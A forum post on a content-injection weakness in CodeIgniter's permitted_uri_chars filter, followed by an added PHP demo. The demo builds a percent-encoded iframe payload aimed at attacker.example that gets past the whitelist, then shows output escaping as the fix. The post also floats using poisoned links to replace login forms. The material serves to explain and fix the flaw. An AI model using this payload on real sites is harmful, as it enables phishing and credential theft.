Potential permitted_uri_chars exploit

Forgive me if this has been covered. I did do some searching to see if it has been covered on the forums and Google.

Currently permitted_uri_chars allows any URL-encoded characters to be passed straight through to most functions using uri_string();

$config['permitted_uri_chars'] = 'a-z 0-9~%.:_\-';

Example of the attack

Given the encoding translation it can be tricky to reproduce. But the above attack will parse an iframe onto any page which calls uri_string() or current_url(), e.g.
<a href="<?php echo uri_string(); ?>">link</a>

Currently I'm looking at removing URL-encoded characters (%) from the URI. GET vars seem to be unaffected by the permitted_uri_chars filter.

This is not a database exploit, but a content insertion exploit.

Thoughts and comments welcome.

Oh, if you are seeing the iframe, you are seeing it un-encoded (tricky to post in the forums) and will need to URL-encode everything after view/ before pasting it into the browser address bar. It's tricky, but once you know how to do it, it's quite easy to html.

Conceivably you could post a poisoned link which, on click, replaces a login form using a form action using current_url().
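The following is an added example, not code from the post above or from CodeIgniter itself. It models the permitted_uri_chars check the post describes (every character of a segment must be in the permitted set), shows that a percent-encoded iframe payload consists only of permitted characters and therefore passes, and then shows the two fixes the post hints at: escaping on output, and dropping `%` from the permitted set. The names `segment_passes_filter`, `vulnerable_link`, `safe_link` and `encoded_payload` are hypothetical; the assumption that the segment is percent-decoded before the view echoes it (the "encoding translation" the post mentions) is modelled with `rawurldecode()`.

```php
<?php
// Added example, not the original post's code nor CodeIgniter's own implementation.
declare(strict_types=1);

// The default pattern quoted in the post.
const PERMITTED_URI_CHARS = 'a-z 0-9~%.:_\-';

// Alternative fix the post is considering: drop '%' so that percent-encoded
// segments are rejected outright.
const PERMITTED_URI_CHARS_NO_PERCENT = 'a-z 0-9~.:_\-';

// Model of the per-segment whitelist check: the segment is accepted only if
// every character is in the permitted set (case-insensitive).
// Assumption: this mirrors the behaviour described in the post; it is not
// CodeIgniter's own code.
function segment_passes_filter(string $segment, string $permitted = PERMITTED_URI_CHARS): bool
{
    return (bool) preg_match('/^[' . $permitted . ']+$/i', $segment);
}

// Hypothetical view helper, as in the post: the URI is echoed straight into
// an HTML attribute without escaping.
function vulnerable_link(string $uri_string): string
{
    return '<a href="' . $uri_string . '">link</a>';
}

// Hardened version: escape for the HTML attribute context before echoing.
// Quotes are escaped (ENT_QUOTES), so the payload cannot close the href.
function safe_link(string $uri_string): string
{
    return '<a href="' . htmlspecialchars($uri_string, ENT_QUOTES, 'UTF-8') . '">link</a>';
}

// Constructed payload: an iframe that closes the href attribute first.
// After rawurlencode() it contains only letters, digits, '.' and '%'.
function encoded_payload(): string
{
    return rawurlencode('"><iframe src="http://attacker.example/"></iframe>');
}

// Walk through the attack: the attacker requests /view/<encoded payload>.
function demo(): array
{
    $payload = encoded_payload();

    // 1. The whitelist sees only permitted characters and lets it through.
    $passes_default = segment_passes_filter($payload);

    // 2. Without '%' in the permitted set the same segment is rejected.
    $passes_no_percent = segment_passes_filter($payload, PERMITTED_URI_CHARS_NO_PERCENT);

    // 3. Assumption: by the time the view runs, the segment has been decoded
    //    (the "encoding translation" mentioned in the post).
    $decoded_uri = 'view/' . rawurldecode($payload);

    $vulnerable_html = vulnerable_link($decoded_uri);
    $safe_html       = safe_link($decoded_uri);

    return [
        'encoded_segment'        => $payload,
        'passes_default_filter'  => $passes_default,                 // true
        'passes_without_percent' => $passes_no_percent,              // false
        'vulnerable_html'        => $vulnerable_html,
        'iframe_injected'        => strpos($vulnerable_html, '<iframe') !== false, // true
        'safe_html'              => $safe_html,
        'iframe_escaped'         => strpos($safe_html, '<iframe') === false,       // true
    ];
}

// Usage: php uri_filter_demo.php
print_r(demo());
```

The decoded payload starts with `">`, so in `vulnerable_link()` it closes the `href` attribute and the `<iframe>` lands in the page body, exactly the content-insertion the post describes; `safe_link()` turns the same input into `&quot;&gt;&lt;iframe ...`, which renders as text. Tightening permitted_uri_chars blocks this particular vector, but output escaping is the fix that also covers whatever else reaches `uri_string()` or `current_url()`, including the GET variables the post notes are not subject to the filter.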

